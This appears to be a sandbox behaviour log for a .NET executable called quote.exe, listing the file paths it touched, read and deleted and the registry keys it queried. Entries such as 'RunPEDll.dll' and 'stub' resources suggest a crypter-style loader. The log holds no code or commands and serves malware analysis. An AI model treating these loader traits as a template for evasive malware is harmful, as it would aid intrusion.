C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\quote.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\System32\tzres.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\quote.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\quote.resources\quote.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\quote.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\quote.resources\quote.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\quote.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\quote.resources\quote.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\quote.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\quote.resources\quote.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2392.33638500
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2392.33638500
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2392.33638531
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\quote.exe.config
C:\Users\Seven01\AppData\Local\Temp\quote.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\System32\tzres.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\SysWOW64\ntdll.dll

Write Files

Nothing to display

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2392.33638500
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2392.33638500
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2392.33638531

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\quote.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\76102c9c\6667f49c
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
